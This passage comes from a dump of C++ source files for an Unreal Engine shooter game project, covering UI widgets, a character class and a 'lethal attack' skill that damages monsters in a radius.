UPG_UserWidgetScreenPlayStage::UpdateWeaponSlotLightBox()\n{\n\tABCHECK(nullptr != m_pkWB_PlayStageWeaponBag);\n\n\tauto pMyPlayerState = Cast<APG_MyPlayerState>(GetWorld()->GetFirstPlayerController()->PlayerState);\n\tABCHECK(nullptr != pMyPlayerState);\n\n\tint32 nSlotIndex = pMyPlayerState->GetPlayingPlayerData()->EquipWeaponInventoryIndex;\n\tm_pkWB_PlayStageWeaponBag->SetEnableLightBox(nSlotIndex);\n}\n\nvoid UPG_UserWidgetScreenPlayStage::OnFire()\n{\n\tABCHECK(nullptr != m_pkWB_PlayStageWeaponBag);\n\n\tauto pMyPlayerState = Cast<APG_MyPlayerState>(GetWorld()->GetFirstPlayerController()->PlayerState);\n\tABCHECK(nullptr != pMyPlayerState);\n\n\tint32 nSlotIndex = pMyPlayerState->GetPlayingPlayerData()->EquipWeaponInventoryIndex;\n\tint32 nAmmo = pMyPlayerState->GetPlayingPlayerData()->PlayerWeaponAmmo[nSlotIndex];\n\n\tm_pkWB_PlayStageWeaponBag->SetSlotWeaponAmmo(nSlotIndex, nAmmo);\n\n}\n\nvoid UPG_UserWidgetScreenPlayStage::OnChangeWeapon()\n{\n\tUpdateWeaponSlotLightBox();\n}" }, { "alpha_fraction": 0.7758620977401733, "alphanum_fraction": 0.7758620977401733, "avg_line_length": 24.63953399658203, "blob_id": "3cf7d087f9debb93c3b37a9c41ff4b8a350ee269", "content_id": "7406c57f6ff6043d318c2a7a10f3b7e6ea09b122", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2206, "license_type": "no_license", "max_line_length": 181, "num_lines": 86, "path": "/Source/Project_Gun/Private/Character/PG_Char.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Character/PG_Char.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n\n// Sets default values\nAPG_Char::APG_Char()\n{\n \t// Set this character to call Tick() every frame. You can turn this off to improve performance if you don't need it.\n\tPrimaryActorTick.bCanEverTick = false;\n\n\t{\n\t\tCharacterShadowComponent = CreateDefaultSubobject<UStaticMeshComponent>(TEXT(\"SHADOWCOMPONENT\"));\n\n\t\tstatic ConstructorHelpers::FObjectFinder<UStaticMesh>\n\t\t\tDEFAULT_SHADOW(TEXT(\"StaticMesh'/Game/PG/Meshs/Player/ShadowMesh.ShadowMesh'\"));\n\t\tif (DEFAULT_SHADOW.Succeeded())\n\t\t{\n\t\t\tCharacterShadowComponent->SetStaticMesh(DEFAULT_SHADOW.Object);\n\t\t\tCharacterShadowComponent->SetupAttachment(GetMesh());\n\t\t\tCharacterShadowComponent->SetCollisionEnabled(ECollisionEnabled::NoCollision);\n\t\t}\n\t}\n}\n\n// Called when the game starts or when spawned\nvoid APG_Char::BeginPlay()\n{\n\tSuper::BeginPlay();\n}\n\nvoid APG_Char::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n}\n\nvoid APG_Char::Destroyed()\n{\n\tSuper::Destroyed();\n}\n\nvoid APG_Char::FellOutOfWorld(const class UDamageType& dmgType)\n{\n\tSuper::FellOutOfWorld(dmgType);\n}\n\n// Called every frame\nvoid APG_Char::Tick(float DeltaTime)\n{\n\tSuper::Tick(DeltaTime);\n\n}\n\n// Called to bind functionality to input\nvoid APG_Char::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)\n{\n\tSuper::SetupPlayerInputComponent(PlayerInputComponent);\n\n}\n\nbool APG_Char::AssetLoadCharacter(FString AssetPath)\n{\n\tauto PGGameInstance = Cast<UPG_GameInstance>(GetGameInstance());\n\tABCHECK(nullptr != PGGameInstance, false);\n\n\tFSoftObjectPath CharacterAssetToLoad = AssetPath;\n\tAssetStreamingHandle = PGGameInstance->StreamableManager.RequestAsyncLoad(CharacterAssetToLoad, FStreamableDelegate::CreateUObject(this, &APG_Char::OnAssetLoadCharacterCompleted));\n\n\treturn true;\n}\n\nvoid APG_Char::Fire()\n{\n\n}\n\nvoid APG_Char::OnAssetLoadCharacterCompleted()\n{\n\tUSkeletalMesh* AssetLoaded = Cast<USkeletalMesh>(AssetStreamingHandle->GetLoadedAsset());\n\tAssetStreamingHandle.Reset();\n\n\tABCHECK(nullptr != AssetLoaded);\n\tABCHECK(nullptr != GetMesh());\n\n\tGetMesh()->SetSkeletalMesh(AssetLoaded);\n}" }, { "alpha_fraction": 0.7457817792892456, "alphanum_fraction": 0.7630296349525452, "avg_line_length": 33.20512771606445, "blob_id": "68fe1bd2af98b6148dd85b74dd5a460d44482717", "content_id": "932d0a84d961bc6882917f11c7a9e44167d9c3e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2669, "license_type": "no_license", "max_line_length": 98, "num_lines": 78, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetStageClearTarget.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"UI/PG_UserWidgetStageClearTarget.h\"\n\n#include <Components/Overlay.h>\n#include <Components/TextBlock.h>\n\nvoid UPG_UserWidgetStageClearTarget::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\n\tABCHECK(nullptr != Flag_Clear);\n\tABCHECK(nullptr != Flag_InProgress);\n\tABCHECK(nullptr != Text_CurrFlag);\n\tABCHECK(nullptr != Text_MaxFlag);\n\tABCHECK(nullptr != Lethal_Clear);\n\tABCHECK(nullptr != Text_CurrLethal);\n\tABCHECK(nullptr != Text_MaxLethal);\n\tABCHECK(nullptr != Time_Clear);\n\tABCHECK(nullptr != Text_CurrTime);\n\n}\n\nvoid UPG_UserWidgetStageClearTarget::SetDataFlag(bool bClear, int32 nCurrValue, int32 nMaxValue)\n{\n\tif (bClear)\n\t{\n\t\tText_CurrFlag->SetColorAndOpacity(FSlateColor(FLinearColor(0.0f, 1.0f, 0.0f)));\n\t\tFlag_Clear->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\tFlag_InProgress->SetVisibility(ESlateVisibility::Hidden);\n\t}\n\telse\n\t{\n\t\tText_CurrFlag->SetColorAndOpacity(FSlateColor(FLinearColor(1.0f, 0.0f, 0.0f)));\n\t\tFlag_Clear->SetVisibility(ESlateVisibility::Hidden);\n\t\tFlag_InProgress->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t}\n\n\tText_CurrFlag->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nCurrValue)));\n\tText_MaxFlag->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nMaxValue)));\n}\n\nvoid UPG_UserWidgetStageClearTarget::SetDataLethal(bool bClear, int32 nCurrValue, int32 nMaxValue)\n{\n\tif (bClear)\n\t{\n\t\tText_CurrLethal->SetColorAndOpacity(FSlateColor(FLinearColor(0.0f, 1.0f, 0.0f)));\n\t\tLethal_Clear->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\tLethal_InProgress->SetVisibility(ESlateVisibility::Hidden);\n\t}\n\telse\n\t{\n\t\tText_CurrLethal->SetColorAndOpacity(FSlateColor(FLinearColor(1.0f, 0.0f, 0.0f)));\n\t\tLethal_Clear->SetVisibility(ESlateVisibility::Hidden);\n\t\tLethal_InProgress->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t}\n\n\tText_CurrLethal->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nCurrValue)));\n\tText_MaxLethal->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nMaxValue)));\n}\n\nvoid UPG_UserWidgetStageClearTarget::SetDataTime(bool bClear, int32 nCurrTime)\n{\n\tif (bClear)\n\t{\n\t\tText_CurrTime->SetColorAndOpacity(FSlateColor(FLinearColor(0.0f, 1.0f, 0.0f)));\n\t\tTime_Clear->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\tTime_InProgress->SetVisibility(ESlateVisibility::Hidden);\n\t}\n\telse\n\t{\n\t\tText_CurrTime->SetColorAndOpacity(FSlateColor(FLinearColor(1.0f, 0.0f, 0.0f)));\n\t\tTime_Clear->SetVisibility(ESlateVisibility::Hidden);\n\t\tTime_InProgress->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t}\n\n\tText_CurrTime->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nCurrTime)));\n}" }, { "alpha_fraction": 0.7944250702857971, "alphanum_fraction": 0.8083623647689819, "avg_line_length": 19.5, "blob_id": "1859c01bb249a0431e517818563855e5144bcb64", "content_id": "a79abf12916a0d17c4aedc908d4ccec10428067e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 289, "license_type": "no_license", "max_line_length": 73, "num_lines": 14, "path": "/Source/Project_Gun/Public/Define/PG_DefineDelegate.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include \"PG_DefineDelegate.generated.h\"\n\nDECLARE_MULTICAST_DELEGATE(FOnBtnClickedOK);\nDECLARE_MULTICAST_DELEGATE_OneParam(FOnBtnClickedOK_OneValue, int32);\nDECLARE_MULTICAST_DELEGATE_OneParam(FOnBtnClickedCancel_OneValue, int32);\n\n\nUENUM()\nenum NoopEnum\n{\n\teNoopEnum,\n};\n" }, { "alpha_fraction": 0.7654265761375427, "alphanum_fraction": 0.7693604826927185, "avg_line_length": 29.060810089111328, "blob_id": "4d404a0843e0068d7cfe867bc81dfd48a4aa1274", "content_id": "3683334690f160a6710e143bd765d4d536276edc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 9333, "license_type": "no_license", "max_line_length": 211, "num_lines": 296, "path": "/Source/Project_Gun/Private/BlueScriptObject/LethalAttack/PG_LethalAttack.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"BlueScriptObject/LethalAttack/PG_LethalAttack.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n#include \"Player/PlayerController/PG_PlayerController.h\"\n#include \"Character/PG_MonChar.h\"\n#include \"Character/PG_MyChar.h\"\n#include \"Game/GameState/PG_GameStateStage.h\"\n\n#include <Components/AudioComponent.h>\n//#include <DrawDebugHelpers.h>\n\n// Sets default values\nAPG_LethalAttack::APG_LethalAttack()\n{\n \t// Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.\n\tPrimaryActorTick.bCanEverTick = true;\n\n\tCollisionComponent = CreateDefaultSubobject<USphereComponent>(TEXT(\"SphereComponent\"));\n\tCollisionComponent->SetCollisionProfileName(TEXT(\"CharacterSkill\"));\n\n\tRootComponent = CollisionComponent;\n\n\tLShowingEffect = CreateDefaultSubobject<UParticleSystemComponent>(TEXT(\"LShowingEffect\"));\n\tLShowingEffect->SetupAttachment(CollisionComponent);\n\tLShowingEffect->SetCollisionProfileName(TEXT(\"CharacterSkill\"));\n\tLShowingEffect->bAutoActivate = false;\n\n\tLEffectVisual = CreateDefaultSubobject<UParticleSystemComponent>(TEXT(\"LEffectVisual\"));\n\tLEffectVisual->SetupAttachment(CollisionComponent);\n\tLEffectVisual->SetCollisionProfileName(TEXT(\"CharacterSkill\"));\n\tLEffectVisual->OnSystemFinished.AddDynamic(this, &APG_LethalAttack::OnEndEffectVisual);\n\tLEffectVisual->bAutoActivate = false;\n\n\tLethalSoundComponent = CreateDefaultSubobject<UAudioComponent>(TEXT(\"LethalSoundComponent\"));\n\tLethalSoundComponent->bAutoActivate = false;\n\n\tLethalPoint = 0.0f;\n}\n\nvoid APG_LethalAttack::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n\n\tif (LShowingEffect)\n\t\tLShowingEffect->SetVisibility(false);\n\n\tif (LEffectVisual)\n\t\tLEffectVisual->SetVisibility(false);\n}\n\n// Called when the game starts or when spawned\nvoid APG_LethalAttack::BeginPlay()\n{\n\tSuper::BeginPlay();\n\n\tOnInitLethal();\n}\n\n// Called every frame\nvoid APG_LethalAttack::Tick(float DeltaTime)\n{\n\tSuper::Tick(DeltaTime);\n\n//#ifdef ENABLE_DRAW_DEBUG\n//\tfloat fAttackRange = GetAttackRange();\n//\n//\tFVector TraceVec = GetActorForwardVector() * fAttackRange;\n//\tFVector Center = GetActorLocation();\n//\tfloat HalfHeight = fAttackRange;\n//\tFQuat CapsuleRot = FRotationMatrix::MakeFromZ(TraceVec).ToQuat();\n//\tFColor DrawColor = LethalPoint < LethalAttackData.LMinPoint ? FColor::Purple : FColor::Emerald;\n//\tfloat DebugLifeTime = 0.03f;\n//\n//\tDrawDebugCapsule(GetWorld(),\n//\t\tCenter,\n//\t\tHalfHeight,\n//\t\tfAttackRange,\n//\t\tCapsuleRot,\n//\t\tDrawColor,\n//\t\tfalse,\n//\t\tDebugLifeTime);\n//#endif\n}\n\n\nvoid APG_LethalAttack::BindPlayerState(class APG_MyPlayerState* APlayerState)\n{\n\tABCHECK(nullptr != APlayerState);\n\n\tHandleOnBasicAttackMonsterKill = APlayerState->OnDefaultAttackMonsterKill.AddUObject(this, &APG_LethalAttack::OnAddLethalPoint);\n\tHandleOnReadyToUseTheLethalAttack = APlayerState->OnReadyToUseTheLethalAttack.AddUObject(this, &APG_LethalAttack::OnReadyToUseTheLethalAttack);\n\tHandleOnUseTheLethalAttackSuccess = APlayerState->OnTryUseTheLethalAttack.AddUObject(this, &APG_LethalAttack::OnTryUseTheLethalAttack);\n\tHandleOnUseTheLethalAttackFail = APlayerState->OnUseTheLethalAttackFail.AddUObject(this, &APG_LethalAttack::OnUseTheLethalAttackFail);\n}\n\nvoid APG_LethalAttack::UnBindPlayerState(class APG_MyPlayerState* APlayerState)\n{\n\tABCHECK(nullptr != APlayerState);\n\n\tAPlayerState->OnDefaultAttackMonsterKill.Remove(HandleOnBasicAttackMonsterKill);\n\tAPlayerState->OnReadyToUseTheLethalAttack.Remove(HandleOnReadyToUseTheLethalAttack);\n\tAPlayerState->OnTryUseTheLethalAttack.Remove(HandleOnUseTheLethalAttackSuccess);\n\tAPlayerState->OnUseTheLethalAttackFail.Remove(HandleOnUseTheLethalAttackFail);\n}\n\nvoid APG_LethalAttack::SetLethaAttackData(const FPGLethalAttackData* pLethalAttackData)\n{\n\tLethalAttackData = *pLethalAttackData;\n}\n\nbool APG_LethalAttack::IsReadyLethal()\n{\n\treturn (LethalPoint >= LethalAttackData.LMinPoint);\n}\n\nfloat APG_LethalAttack::GetAttackRange()\n{\n\t// 필살기의 타격 범위는 필살기가 가지고 있는 \"필살기 최대 범위(LMaxRange)\"를 필살기의 \"필살기 최대 킬(LMaxPoint)\"로 나눈 뒤 \n\t// 플레이어의 \"필살기 현재 수치(LethalPoint)\"를 곱해준다.\n\t// Ex) StrongWindAttack 필살기(LmaxRange: 300, LMaxPoint: 100)를 사용할 때, \n\t// 플레이어의 \"필살기 현재 수치(LethalPoint)\"가 60이면 해당 필살기가 가동될때 범위는 180이다. \n\treturn (float)(LethalAttackData.LMaxRange / LethalAttackData.LMaxPoint) * (float)LethalPoint;\n}\n\nfloat APG_LethalAttack::GetRatioAttackRange()\n{\n\treturn GetAttackRange() / (float)LethalAttackData.LMaxRange;\n}\n\nbool APG_LethalAttack::FindingDamagedMonsters(OUT TArray<class APG_MonChar*>& GetMonsters)\n{\n\tfloat fAttackRange = GetAttackRange();\n\n\tTArray<FHitResult> HitResult;\n\tFCollisionQueryParams Params(NAME_None, false, this);\n\n\tbool bResult = GetWorld()->SweepMultiByChannel(\n\t\tHitResult,\n\t\tGetActorLocation(),\n\t\tGetActorLocation(),\n\t\tFQuat::Identity,\n\t\tECollisionChannel::ECC_GameTraceChannel4,\n\t\tFCollisionShape::MakeSphere(fAttackRange),\n\t\tParams);\n\n//#ifdef ENABLE_DRAW_DEBUG\n//\tFVector TraceVec = GetActorForwardVector() * fAttackRange;\n//\tFVector Center = GetActorLocation();\n//\tfloat HalfHeight = fAttackRange;\n//\tFQuat CapsuleRot = FRotationMatrix::MakeFromZ(TraceVec).ToQuat();\n//\tFColor DrawColor = FColor::Orange;\n//\tfloat DebugLifeTime = 1.0f;\n//\n//\tDrawDebugCapsule(GetWorld(),\n//\t\tCenter,\n//\t\tHalfHeight,\n//\t\tfAttackRange,\n//\t\tCapsuleRot,\n//\t\tDrawColor,\n//\t\tfalse,\n//\t\tDebugLifeTime);\n//#endif\n\n\tif (bResult)\n\t{\n\t\tfor (auto Monster : HitResult)\n\t\t{\n\t\t\tauto AMonster = Cast<class APG_MonChar>(Monster.GetActor());\n\t\t\tif (AMonster)\n\t\t\t\tGetMonsters.Add(AMonster);\n\t\t}\n\t}\n\n\treturn bResult;\n}\n\n\nvoid APG_LethalAttack::OnReadyToUseTheLethalAttack()\n{\n\tif (LShowingEffect && false == LShowingEffect->IsVisible())\n\t{\n\t\tfloat fScale = GetAttackRange();\n\t\tLShowingEffect->SetRelativeScale3D(FVector(fScale, fScale, fScale));\n\t\tLShowingEffect->SetActive(true, true);\n\t\tLShowingEffect->SetVisibility(true);\n\t}\n}\n\nvoid APG_LethalAttack::OnUseTheLethalAttackFail()\n{\n\n}\n\nvoid APG_LethalAttack::OnTryUseTheLethalAttack()\n{\n\tif (LethalPoint < LethalAttackData.LMinPoint)\n\t\treturn;\n\n\t// 필살기 충전 이펙트 숨김\n\tif (LShowingEffect && LShowingEffect->IsVisible())\n\t{\n\t\tLShowingEffect->SetVisibility(false);\n\t}\n\n\t// 필살기 사용 이펙트를 충전 범위만큼 스케일하여 출력\n\tif (LEffectVisual && false == LEffectVisual->IsVisible())\n\t{\n\t\tfloat fScale = GetAttackRange() / 100.0f;\n\t\tLEffectVisual->SetRelativeScale3D(FVector(fScale, fScale, fScale));\n\t\tLEffectVisual->SetActive(true, true);\n\t\tLEffectVisual->SetVisibility(true);\n\t}\n\n\t// 캐릭터에서 오브젝트를 분리시키고 월드상에 위치를 고정시킨다.\n\tDetachFromActor(FDetachmentTransformRules::KeepWorldTransform);\n\n\t// 필살기 범위 내 몬스터에게 데미지를 주고 이때 죽은 몬스터를 찾는다.\n\tTArray<class APG_MonChar*> DamagedMonsters;\n\tFindingDamagedMonsters(DamagedMonsters);\n\tfor (auto AMonster : DamagedMonsters)\n\t{\n\t\tif (AMonster && false == AMonster->IsActorBeingDestroyed())\n\t\t{\n\t\t\tABLOG(Warning, TEXT(\"DamgeMonster : %s\"), *AMonster->GetName());\n\t\t\tif (AMonster->OnDamage(LethalAttackData.LPower, true))\n\t\t\t{\n\t\t\t\tMaxLethalKill += 1;\n\t\t\t}\n\t\t}\n\t}\n\n\t// 캐릭터의 필살기 장착 해제\n\tauto AMyChar = Cast<APG_MyChar>(GetOwner());\n\tif (AMyChar)\n\t\tAMyChar->UnEquipLethalAttack();\n\n\t// 죽인 몬스터를 정산하여 GameStateStage에게 전달한다.\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tif (pGameStateStage)\n\t\tpGameStateStage->SetMaxLethalKill(MaxLethalKill);\n\n\t// 필살기 사운드 재생\n\tif (LethalSoundComponent)\n\t\tLethalSoundComponent->Play();\n}\n\nvoid APG_LethalAttack::OnAddLethalPoint(class APG_MonChar* AMonster)\n{\n\tif (LethalPoint > LethalAttackData.LMaxPoint)\n\t\treturn;\n\n\tLethalPoint++;\n\n\tif (LShowingEffect && LShowingEffect->IsVisible())\n\t{\n\t\tfloat fScale = GetAttackRange() / 100.0f;\n\t\tLShowingEffect->SetRelativeScale3D(FVector(fScale, fScale, fScale));\n\t}\n\n\tif (false == m_bReadyLethal && IsReadyLethal())\n\t{\n\t\tm_bReadyLethal = true;\n\t\tOnReadyLethal();\n\t}\n}\n\nvoid APG_LethalAttack::OnEndEffectVisual(UParticleSystemComponent* ParticleSystemComponent)\n{\n\tDestroy();\n}\n\nvoid APG_LethalAttack::OnBegineOverlap(UPrimitiveComponent* OverlappedComponent, AActor* OtherActor, UPrimitiveComponent* OtherComp, int32 OtherBodyIndex, bool bFromSweep, const FHitResult& SweepResult)\n{\n\tauto AMonCharacter = Cast<APG_MonChar>(OtherActor);\n\tif (AMonCharacter)\n\t{\n\t\tABLOG(Warning, TEXT(\"Lethal Damage : %s\"), *AMonCharacter->GetName());\n\t\tAMonCharacter->OnDamage(LethalAttackData.LPower, true);\n\t}\n}\n\nvoid APG_LethalAttack::OnParticleCollide(FName EventName, float EmitterTime, int32 ParticleTime, FVector Location, FVector Velocity, FVector Direction, FVector Normal, FName BoneName, UPhysicalMaterial* PhysMat)\n{\n\n}\n\nvoid APG_LethalAttack::OnComponentHit(UPrimitiveComponent* HitComponent, AActor* OtherActor, UPrimitiveComponent* OtherComp, FVector NormalImpulse, const FHitResult& Hit)\n{\n\tauto AMonCharacter = Cast<APG_MonChar>(OtherActor);\n\tif (AMonCharacter)\n\t{\n\t\tABLOG(Warning, TEXT(\"Lethal Damage : %s\"), *AMonCharacter->GetName());\n\t\tAMonCharacter->OnDamage(LethalAttackData.LPower, true);\n\t}\n}" }, { "alpha_fraction": 0.7204219102859497, "alphanum_fraction": 0.7224880456924438, "avg_line_length": 31.84642791748047, "blob_id": "8d3d31e940a99a2305ae36c4aef48571ee5728d6", "content_id": "e3743bb002a5d69e26333805fad5c12be5d31670", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 9368, "license_type": "no_license", "max_line_length": 118, "num_lines": 280, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetMainLobby_Renewal.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n\n#include \"UI/PG_UserWidgetMainLobby_Renewal.h\"\n#include \"UI/PG_UserWidgetWeaponBox.h\"\n#include \"UI/PG_UserWidgetWeaponInventory.h\"\n#include \"UI/PG_UserWidgetScreenShop.h\"\n#include \"Game/GameMode/PG_GameModeMainLobby.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"SaveData/PG_SavePlayerData.h\"\n\n#include <Components/Button.h>\n#include <Components/TextBlock.h>\n#include <Components/CanvasPanel.h>\n#include <Components/ScaleBox.h>\n\n\nvoid UPG_UserWidgetMainLobby_Renewal::NativeConstruct()\n{\n\n\t//===========================================\n\t// Canvas TopMenu\n\t//===========================================\n\t//PG_WIDGET_LINK(UUserWidget, WB_RewardPoint);\n\tPG_WIDGET_LINK(UButton, BtnOption);\n\n\t//===========================================\n\t// Canvas StageSelect\n\t//===========================================\n\tPG_WIDGET_LINK(UButton, BtnSelectStagePrev);\n\tPG_WIDGET_LINK(UButton, BtnSelectStageNext);\n\tPG_WIDGET_LINK(UTextBlock, TextSelectedStage);\n\tPG_WIDGET_LINK(UCanvasPanel, CanvasSelectStageLock);\n\n\t//===========================================\n\t// Canvas Mission\n\t//===========================================\n\tPG_WIDGET_LINK(UButton, BtnFlag);\n\tPG_WIDGET_LINK(UButton, BtnLethal);\n\tPG_WIDGET_LINK(UButton, BtnTime);\n\tPG_WIDGET_LINK(UTextBlock, TextMainLobbyFlag);\n\tPG_WIDGET_LINK(UTextBlock, TextMainLobbyLethal);\n\tPG_WIDGET_LINK(UTextBlock, TextMainLobbyTime);\n\n\t//===========================================\n\t// Canvas MenuButtons\n\t//===========================================\n\tPG_WIDGET_LINK(UButton, BtnGameStart);\n\tPG_WIDGET_LINK(UButton, BtnShop);\n\tPG_WIDGET_LINK(UCanvasPanel, CanvasGameStart);\n\n\t//===========================================\n\t// Canvas WeaponBox (무기 슬롯)\n\t//===========================================\n\tPG_WIDGET_LINK_TArray(UPG_UserWidgetWeaponBox, WB_WeaponBox, eMaxWeaponSlot);\n\n\tint nIndex = 0;\n\tfor (auto Box : m_pkWB_WeaponBox)\n\t{\n\t\tif (Box)\n\t\t{\n\t\t\tBox->SetEnable(false);\n\t\t\tBox->SetSlotIndex(nIndex++);\n\t\t\tBox->OnBtnWeaponClicked_SlotIndex.AddUObject(this, &UPG_UserWidgetMainLobby_Renewal::OnOpenWeaponInventory);\n\t\t}\n\t}\n\n\t//===========================================\n\t// Canvas ADBanner\n\t//===========================================\n\n\t//===========================================\n\t// Canvas WeaponInventory (무기 인벤토리)\n\t//===========================================\n\tPG_WIDGET_LINK(UScaleBox, ScaleWeaponInventory);\n\tPG_WIDGET_LINK(UPG_UserWidgetWeaponInventory, WB_WeaponInventory);\n\tm_pkWB_WeaponInventory->OnBtnClickedClose.AddUObject(this, &UPG_UserWidgetMainLobby_Renewal::OnCloseWeaponInventory);\n\n\tSuper::NativeConstruct();\n\n}\n\nvoid UPG_UserWidgetMainLobby_Renewal::UpdateLayoutStage()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tauto pGameModeMainLobby = Cast<APG_GameModeMainLobby>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeMainLobby);\n\n\tint32 nSelectedStageID = pGameModeMainLobby->GetPlayStageID();\n\tconst FPGStageData* cpStageData = pGameInstance->GetTableStageData(nSelectedStageID);\n\tABCHECK(nullptr != cpStageData);\n\n\tconst FPGStageData* cpNextStageData = pGameInstance->GetTableStageData(nSelectedStageID + 1);\n\tconst FPGStageData* cpPrevStageData = pGameInstance->GetTableStageData(nSelectedStageID - 1);\n\n\tm_pkBtnSelectStageNext->SetIsEnabled((nullptr != cpNextStageData));\n\tm_pkBtnSelectStagePrev->SetIsEnabled((nullptr != cpPrevStageData));\n\n\tbool bIsFirstPlayCurrStage = pGameModeMainLobby->IsFirstPlayStage(nSelectedStageID);\n\tbool bIsFirstPlayNextStage = pGameModeMainLobby->IsFirstPlayStage(nSelectedStageID + 1);\n\tbool bIsFirstPlayPrevStage = pGameModeMainLobby->IsFirstPlayStage(nSelectedStageID - 1);\n\n\t// 처음 플레이 하는 경우\n\tif (bIsFirstPlayCurrStage)\n\t{\n\t\tif (1 == nSelectedStageID || false == bIsFirstPlayPrevStage)\n\t\t{\n\t\t\tm_pkCanvasSelectStageLock->SetVisibility(ESlateVisibility::Hidden);\n\t\t\tm_pkCanvasGameStart->SetIsEnabled(true);\n\t\t}\n\t\t// 다음 스테이지 진행 안했음\n\t\telse if (bIsFirstPlayNextStage)\n\t\t{\n\t\t\tm_pkCanvasSelectStageLock->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\t\tm_pkCanvasGameStart->SetIsEnabled(false);\n\t\t}\n\t}\n\telse\n\t{\n\t\tm_pkCanvasSelectStageLock->SetVisibility(ESlateVisibility::Hidden);\n\t\tm_pkCanvasGameStart->SetIsEnabled(true);\n\t}\n}\n\nvoid UPG_UserWidgetMainLobby_Renewal::UpdateLayoutMission()\n{\n\t//m_pkWB_RewardPoint->UpdateRewardPoint();\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tauto pGameModeMainLobby = Cast<APG_GameModeMainLobby>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeMainLobby);\n\n\tauto pSavePlayerData = pGameModeMainLobby->GetSavePlayerData();\n\tABCHECK(nullptr != pSavePlayerData);\n\n\tint32 nSelectedStageID = pGameModeMainLobby->GetPlayStageID();\n\tconst FPGStageData* cpStageData = pGameInstance->GetTableStageData(nSelectedStageID);\n\tABCHECK(nullptr != cpStageData);\n\n\tbool bIsClearAmount = pGameModeMainLobby->IsClearMission(EStageClearType::eSCT_AmountKill);\n\tbool bIsClearTime = pGameModeMainLobby->IsClearMission(EStageClearType::eSCT_ClearTime);\n\tbool bIsClearLethal = pGameModeMainLobby->IsClearMission(EStageClearType::eSCT_Lethal);\n\n\tm_pkBtnFlag->SetIsEnabled(!bIsClearAmount);\n\tm_pkBtnLethal->SetIsEnabled(!bIsClearLethal);\n\tm_pkBtnTime->SetIsEnabled(!bIsClearTime);\n\n\tm_pkTextMainLobbyFlag->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), cpStageData->M_Amount)));\n\tm_pkTextMainLobbyLethal->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), cpStageData->Multi_Kill)));\n\tm_pkTextMainLobbyTime->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), cpStageData->Time)));\n\n\tm_pkTextSelectedStage->SetText(FText::FromString(cpStageData->StageName));\n}\n\nvoid UPG_UserWidgetMainLobby_Renewal::UpdateLayoutWeaponSlot()\n{\n\tauto pGameModeMainLobby = Cast<APG_GameModeMainLobby>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeMainLobby);\n\n\tauto pSavePlayerData = pGameModeMainLobby->GetSavePlayerData();\n\tABCHECK(nullptr != pSavePlayerData);\n\n\tint nIndex = 0;\n\tfor (auto WeaponSlot : m_pkWB_WeaponBox)\n\t{\n\t\tABCHECK(nullptr != WeaponSlot);\n\t\tWeaponSlot->SetWeaponIndex(pGameModeMainLobby, pSavePlayerData->m_kEquipWeaponTableIndex[nIndex]);\n\n\t\tif (PG_MAX_WEAPON_SLOT - 1 == nIndex)\n\t\t\tWeaponSlot->SetEnable(pSavePlayerData->m_bExtendWeaponSlot);\n\t\telse\n\t\t\tWeaponSlot->SetEnable(true);\n\n\t\tnIndex++;\n\t}\n}\n\nvoid UPG_UserWidgetMainLobby_Renewal::OnBtnOption()\n{\n\n}\n\nvoid UPG_UserWidgetMainLobby_Renewal::OnBtnSelectStageNext()\n{\n\tauto pGameModeMainLobby = Cast<APG_GameModeMainLobby>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != 